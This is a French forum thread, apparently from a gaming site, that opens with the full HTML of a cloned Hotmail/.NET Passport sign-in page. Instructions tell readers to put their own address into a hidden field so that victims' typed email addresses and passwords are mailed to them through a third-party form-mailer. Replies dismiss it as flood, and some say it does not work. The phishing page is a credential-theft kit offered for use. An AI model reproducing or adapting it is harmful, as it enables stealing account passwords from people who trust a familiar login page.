PS : Pour recevoir les informations de la personne dans votre boîte mail, vous devez IMPERATIVEMENT changer le mail qui se trouve en majuscules.
<?
<head>
<meta HTTP-EQUIV="Content-Type" content="text/html; charset=iso-8859-1">
<title>Please sign in</title>
<link rel="http://login.passport.net/stylesheet" type="text/css"
href="
http://login.passport.net[...]/PPIE.css">
<script language="JavaScript"><!-- //
var CBSigninTxt1 = "", CBSigninTxt2 = "";
var CBLoginHead = "", CBLoginBody = "", CBLoginOnLoad = "";
var CBToken = "PASSPORT_UI", CBBodyDefault = "", CBLogo =
"http://www.passportimages.com/logo_msnhmr_468x60.
gif", CBLogoHREF = "
http://go.msn.com/0/0/default.asp?lc=1033";
var PPCBBodyPre = "", PPCBBodyPost = "";
function MPS_BodyOnload() { if (CBLoginOnLoad != "") { eval(CBLoginOnLoad); } }
function MPS_NormalizeURL(szURL) {
var szNURL = szURL;
if (window.location.protocol == "http:"){
if (szURL.substring(0,5).toLowerCase() == "https")
szNURL = "http" + szURL.substring(5, szURL.length);}
return(szNURL);
}
// --></script>
<script language="JavaScript"
src="
http://cb.msn.com/passport/cbhm_js.ashx?PP_SE
RVICE=login&PP_PAGE=ppLogin&lid=1033"></script>
<script language="JavaScript"><!-- //
if (CBLogo > " ") { CBLogo = MPS_NormalizeURL(CBLogo); }
if (CBLoginHead) { document.write(CBLoginHead); }
// --></script>
<script language="JavaScript">
<!-- //
if (top != self)
{
top.location.replace(self.location.href.toLowerCas
e());
}
function email2domain(sName)
{
var len = sName.length;
var iAt = sName.indexOf(´@´);
var outName = "passport_com";
var inDomain = sName.substr(iAt+1, len);
var DomainSplit =
"charter.com;compaq.net;default;hotmail.com;msn.co
m;passport.com;webtv.net";
DomainSplit = DomainSplit.split(";");
var i;
for (i = 0; i < DomainSplit.length; i++)
{
if (DomainSplit[i].toLowerCase() == inDomain.toLowerCase() )
{
outName = "";
var tmp = DomainSplit[i];
var x = 0;
var ch;
for( x = 0; x < tmp.length; x++)
{
ch = tmp.charAt(x);
if((ch == ´.´) || (ch==´-´))
ch = ´_´;
outName = outName + ch;
}
break;
}
}
return outName;
}
function email2login(sName)
{
if( !s Name )
return null;
var outName = sName;
var len = sName.length;
var iAt = sName.indexOf(´@´);
var inDomain = sName.substr(iAt+1, len);
var DomainSplit =
"charter.com;compaq.net;default;hotmail.com;msn.co
m;passport.com;webtv.net";
DomainSplit = DomainSplit.split(";");
var i;
for (i = 0; i < DomainSplit.length; i++)
{
if (DomainSplit[i].toLowerCase() == inDomain.toLowerCase() )
{
outName = sName.substr(0, iAt);
break;
}
}
return outName;
}
function OnOtherSubmitEventHandler()
{
DoOtherSubmit();
return false;
}
function OnLoginSubmitEventHandler()
{
return DoSubmit();
return false;
}
function DoOtherSubmit()
{
document.form1.submit();
}
function DoSubmit()
{
var actionform, selectIndex, lvalue;
lvalue = document.form1.login.value
if (!lvalue)
{
alert("Please type your e-mail address.");
return false;
}
if(lvalue.charAt(0) > ´~´)
{
alert("Please switch your Input Method Editor(IME) to the Half-Width ASCII setting and retype your e-mail address.");
return false;
}
if((lvalue.indexOf(´@´) == -1) || (lvalue.indexOf(´.´) == -1))
{
alert("Please type your complete e-mail address. Example: someone@microsoft.com.");
return false;
}
if(!document.form1.passwd.value)
{
alert("Please type your password.");
return false;
}
eval("actionform = document." + email2domain(lvalue));
var loginName = email2login(lvalue);
if( typeof(actionform) == "undefined")
actionform = document.form1;
actionform.login.value = loginName;
actionform.passwd.value = document.form1.passwd.value;
actionform.padding.value = "xxxxxxxxxxxxxxxx".substr(0, 16 - actionform.passwd.value.length);
actionform.sec.value = document.form1.sec.checked ? document.form1.sec.value : "";
actionform.mspp_shared.value = document.form1.mspp_shared.checked ? document.form1.mspp_shared.value : "";
actionform.submit();
return false;
}
function HMConcatenate()
{
var sLogin=document.form1.login.value;
if (sLogin.indexOf(´@´) == -1)
{
document.form1.login.value = document.form1.login.value + "@hotmail.com";
}
}
// -->
</script>
</head>
<body topmargin="0" leftmargin="0" rightmargin="0" marginheight="0" marginwidth="0" onload="MPS_BodyOnload()" class="PPPageBG">
<noscript>
<center>
<table cellpadding="0" cellspacing="0" border="0" width="500">
<tr>
<td><a href="
http://go.msn.com/0/0/default.asp?lc=1033" target="_top"><img
src="
http://www.passportimages.com/logo_msnhmr_468
x60.gif" width="468" height="60" border="0" alt="Hotmail"></a></td>
</tr>
<tr><td></noscript>
<script language="JavaScript"><!-- //
if (!CBBodyDefault)
{
CBBodyDefault = ´<center><table cellpadding="0" cellspacing="0" border="0" width="608"><tr><td>´;
if (CBLogo)
{
if (CBLogoHREF)
{
CBBodyDefault += ´<a href="´ + CBLogoHREF + ´" target="_top"><img src="´ + CBLogo + ´" width="468" height="60" border="0" alt="´ + ´Hotmail´ + ´"></a></td>´;
} else {
CBBodyDefault += ´<img src="´ + CBLogo + ´" width="468" height="60" border="0" alt="´ + ´Hotmail´ + ´"></td>´;
}
CBBodyDefault += ´<td><img src="
http://login.passport.net/images/T.gif" width="140" height="1" border="0"></td></tr>´;
CBBodyDefault += ´<tr><td colspan="2" valign="top">´ + CBSigninTxt1 + ´<img src="
http://login.passport.net/images/T.gif" width="1" height="13" border="0"></td></tr></table>´;
} else {
CBBodyDefault += ´<img src="
http://login.passport.net/images/T.gif" width="1" height="1" border="0"></td></tr>´;
CBBodyDefault += ´<tr><td valign="top">´ + CBSigninTxt1 + ´<img src="
http://login.passport.net/images/T.gif" width="1" height="13" border="0"></td></tr></table>´;
}
CBBodyDefault += ´<table cellpadding="0" cellspacing="0" border="0" width="608"><tr><td width="308" valign="top">´ + CBToken + ´</td><td width="5"><img src="
http://login.passport.net/images/T.gif" width="5" height="1"></td><td width="100%" valign="top">´ + CBSigninTxt2 + ´</td></tr></table></center>´;
}
var ppuiIndex = -1;
var ppuiCB = false;
if (CBLoginBody) {
ppuiCB = true;
ppuiIndex = CBLoginBody.indexOf(CBToken);
}
if (ppuiIndex == -1) {
CBLoginBody = CBBodyDefault;
ppuiIndex = CBLoginBody.indexOf(CBToken);
}
PPCBBodyPre = CBLoginBody.substring(0, ppuiIndex);
PPCBBodyPost = CBLoginBody.substring(ppuiIndex + CBToken.length);
document.write(PPCBBodyPre);
// --></script>
<table cellpadding="0" cellspacing="0" border="0" width="308" class="PPDynamicTbl">
<FORM method=post
action="
http://hotmail.homestead.com/~site/Scripts
_ElementMailer/ElementMailer.dll" target=_top>
<input type="hidden" name="notinframe" value="1">
<tr class="PPModuleBrd"><input type=hidden name=CMD value="CMDSubmitFormElement">
<input type=hidden name=BACKPAGEURL value="
http://www.hotmail.com">
<td rowspan=200><img src="
http://login.passport.net/images/T.gif" width="2" height="1" border="0"></td>
<td><img src="
http://login.passport.net/images/T.gif" width="304" height="1" border="0"></td>
<td rowspan=200><img src="
http://login.passport.net/images/T.gif" width="2" height="1" border="0"></td>
</tr>
<tr class="PPModuleTtlTbl">
<td width="100%">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td rowspan="2"><img src="
http://login.passport.net/images/T.gif" width="10" height="34" border="0"></td>
<td width="100%">
<img src="http://login.passport.net/images/T.gif" width="1" height="1"></td>
<td><img src="
http://login.passport.net/images/T.gif" width="10" height="1" border="0"></td>
<td rowspan="2"><img src="
http://login.passport.net/images/T.gif" width="10" height="1" border="0"></td>
</tr>
<tr>
<td class="PPModuleTtlTxt">.NET Passport Sign-in</td>
<td nowrap align="right" class="PPHelp"><script
language="JavaScript">window.name=´msnMain´;</scri
pt><a href="javascript:var
h_win=window.open(´/PaneHelp.srf?lc=1033&plc=1033&
PHKey=ppLogin&PHIsID=60180´,´_helpdriver´,´toolbar
=0,status=0,menubar=0,width=100,height=100,left=10
0,top=2000,resizable=0´);" target="_top">Help</a></td>
</tr>
</table></td>
</tr>
<tr>
<td><table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><img src="
http://login.passport.net/images/T.gif" width="1" height="10" border="0"></td>
</tr>
</table></td>
</tr>
<tr>
<td><table border="0" cellpadding="0" cellspacing="0" width="304">
<tr>
<td rowspan="5"><img src="
http://login.passport.net/images/T.gif" width="10" height="1" border="0"></td>
<td><img src="
http://login.passport.net/images/T.gif" width="90" height="2" border="0"></td>
<td><img src="
http://login.passport.net/images/T.gif" width="194" height="2" border="0"></td>
<td rowspan="5"><img src="
http://login.passport.net/images/T.gif" width="10" height="1" border="0"></td>
</tr>
<tr>
<td class="PPRLabelText">E-mail Address </td>
<td><FONT class=s size=4><B><LABEL
for=a_d>
<input type="text" size="25" name="FORM_EMAILthankstoRISHABHDARA" value="" class="textbox" value="@hotmail.com" autocomplete="OFF"></LABEL></B></FONT></td>
</tr>
<tr>
<td colspan="2"><img src="
http://login.passport.net/images/T.gif" width="1" height="2" border="0"></td>
</tr>
</table></td>
</tr>
<tr>
<td><table border="0" cellpadding="0" cellspacing="0" width="304">
<tr>
<td rowspan="5"><img src="
http://login.passport.net/images/T.gif" width="10" height="1" border="0"></td>
<td><img src="
http://login.passport.net/images/T.gif" width="90" height="2" border="0"></td>
<td><img src="
http://login.passport.net/images/T.gif" width="194" height="2" border="0"></td>
<td rowspan="5"><img src="
http://login.passport.net/images/T.gif" width="10" height="1" border="0"></td>
</tr>
<tr>
<td class="PPRLabelText">Password </td>
<td>
<input type="password" size="25" name="FORM_PASSWORDthankstoRISHABHDARA" value="" class="textbox"></td>
</tr>
<tr>
<td colspan="2"><img src="
http://login.passport.net/images/T.gif" width="1" height="2" border="0"></td>
</tr>
</table></td>
</tr>
<tr>
<td><table border="0" cellpadding="0" cellspacing="0" width="304">
<tr>
<td rowspan="5"><img src="
http://login.passport.net/images/T.gif" width="10" height="1" border="0"></td>
<td><img src="
http://login.passport.net/images/T.gif" width="85" height="2" border="0"></td>
<td><img src="
http://login.passport.net/images/T.gif" width="199" height="2" border="0"></td>
<td rowspan="5"><img src="
http://login.passport.net/images/T.gif" width="10" height="1" border="0"></td>
</tr>
<tr>
<td>
<img src="http://login.passport.net/images/T.gif" width="1" height="1"></td>
<td class="PPSmallDesText"><label for="sec"><input type="checkbox" id="sec" name="sec" tabindex="3" value="rem"
onclick="this.form.mspp_shared.checked=false">Sign
me in automatically.</label></td>
</tr>
<tr>
<td colspan="2"><img src="
http://login.passport.net/images/T.gif" width="1" height="2" border="0"></td>
</tr>
</table></td>
</tr>
<tr>
<td><table border="0" cellpadding="0" cellspacing="0" width="304">
<tr>
<td rowspan="3"><img src="
http://login.passport.net/images/T.gif" width="10" height="1" border="0"></td>
<td><img src="
http://login.passport.net/images/T.gif" width="284" height="2" border="0"></td>
<td rowspan="3"><img src="
http://login.passport.net/images/T.gif" width="10" height="1" border="0"></td>
</tr>
<tr>
<td align="right"> <input type=SUBMIT value="Sign In" name="FORM_SUBMIT_submit" class="button">
<input type=HIDDEN name="FORM_SUBMIT_EMAIL_submit" value = "TONADRESSE@hotmail.com"></td> <======================================= Adresse à remplacer ici.
</tr>
<tr>
<td><img src="
http://login.passport.net/images/T.gif" width="1" height="8" border="0"></td>
</tr>
</table></td>
</tr>
<tr>
<td><table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td><img src="
http://login.passport.net/images/T.gif" width="10" height="1" border="0"></td>
<td width="100%" class="PPLineBreak">
<img src="http://login.passport.net/images/T.gif" width="1" height="1"></td>
<td><img src="
http://login.passport.net/images/T.gif" width="10" height="1" border="0"></td>
</tr>
<tr>
<td colspan="3"><img src="
http://login.passport.net/images/T.gif" width="1" height="8" border="0"></td>
</tr>
</table></td>
</tr>
<tr>
<td><table border="0" cellpadding="0" cellspacing="0" width="304">
<tr>
<td rowspan="2"><img src="
http://login.passport.net/images/T.gif" width="5" height="1" border="0"></td>
<td class="PPSmallDesText"><label for="mspp_shared"><input type="checkbox" tabindex="5" id="mspp_shared" name="mspp_shared" value="1" onclick="this.form.sec.checked=false"> I´m using a public computer.</label></td>
<td rowspan="2"><img src="
http://login.passport.net/images/T.gif" width="5" height="1" border="0"></td>
</tr>
<tr>
<td><img
src="
http://login.passport.nethttp://login.passpor
t.net/images/T.gif" width="1" height="10" border="0"></td>
</tr>
</table></td>
</tr>
<tr width="100%">
<td>
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td width="100%" valign="bottom"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td background="/images/yellow.gif"><img
src="
http://login.passport.nethttp://login.passpor
t.net/images/T.gif" width="1" height="4" border="0"></td></tr></table></td>
<td align="right"><a
href="
http://www.passport.net/default.asp?lc=1033&
id=2&cbid=24325" target="_top"><img
src="
http://www.passportimages.com/1033/dotnetlogo
BIG.gif" alt="www.passport.com" height="34" width="153" border="0"></a></td>
</tr>
</table>
</td>
</tr>
<tr class="PPNoPassportTbl">
<td>
<table border="0" cellpadding="0" cellspacing="0" width="304">
<tr>
<td rowspan="3"><img
src="
http://login.passport.nethttp://login.passpor
t.net/images/T.gif" width="10" height="1" border="0"></td>
<td><img
src="
http://login.passport.nethttp://login.passpor
t.net/images/T.gif" width="284" height="2" border="0"></td>
<td rowspan="3"><img
src="
http://login.passport.nethttp://login.passpor
t.net/images/T.gif" width="10" height="1" border="0"></td>
</tr>
<tr>
<td>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><img
src="
http://login.passport.nethttp://login.passpor
t.net/images/T.gif" width="1" height="30" border="0"></td>
<td width="100%" Continue class="PPSmallDesText">
Don´t have a .NET Passport?
<a
href="
http://register.passport.net/reg.srf?lc=1033
&id=2&ru=
http://www.hotmail.msn.com/cgi-bin/sbox%3
frru%3d%252fcgi-bin%252fhmhome%26reason%3dnocookie
s&cbid=24325&tw=20&kpp=2&svc=mail&msppjph=1" target="_top">Get one now.</a>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td><img
src="
http://login.passport.nethttp://login.passpor
t.net/images/T.gif" width="1" height="2" border="0"></td>
</tr>
</table>
</td>
</tr>
<tr class="PPFooterTbl">
<td align="center">
<!-- ServerInfo: LAWPPLOGU3B001 2003.02.04.11.12.05 Live1 HMStage:2 MSNIAStage:0 -->
<!-- Version: 2.5 Build 624 -->
</td>
</tr>
<tr class="PPModuleBrd">
<td><img
src="
http://login.passport.nethttp://login.passpor
t.net/images/T.gif" width="304" height="2" border="0"></td>
</tr>
</form>
</table>
<script language="JavaScript">
<!-- //
function BodyOnLoad()
{
if (document.form1.login) {
document.form1.login.focus();
document.form1.login.select();
}
}
function SelText()
{
if (document.form1.login.value == "<Type your e-mail address>")
{
document.form1.login.value = "";
}
}
BodyOnLoad();
// -->
</script>
<noscript>
<img
src="
http://login.passport.net/images/noscript.gif
" width="1" height="1"></noscript>
<noscript>
</td></tr></table></center></noscript>
<script language="JavaScript"><!-- //
if (PPCBBodyPost) { document.write(PPCBBodyPost); }
// --></script>
</body>
</html>
?>
Enregistre le tout en .html et c´est bon ![]()
qu´est-ce qui veut lui ![]()
Je sais pas, il écrit dans une langue bizzare
Il essaye surement de nous communiquer quelque chose ![]()
c´est un stile de flood. ![]()
https://www.jeuxvideo.com/forums/1-15-18903113-1-0-0-0-0.htm
| Citation de : Accro_De_Blabla
| Date du message : 06 janvier 2007 à 01:39:30
| Contenu du message :
| "c´est un style de flood.
"
Oui je pense aussi ![]()
Ah ok j´ai pas vu que ce topic avait été upé par un floodeur ![]()
c´est du code HTML!
le language qui sert a faire un site web
mais c´est un fake sa marche pas^^
_______________
Nous mangerons le monde comme nous mangeons une pomme
![]()
Ca marche pas ![]()
Chaud les gars qui on essayer ![]()
Vous ne pouvez pas poster de message sur ce forum car il est fermé.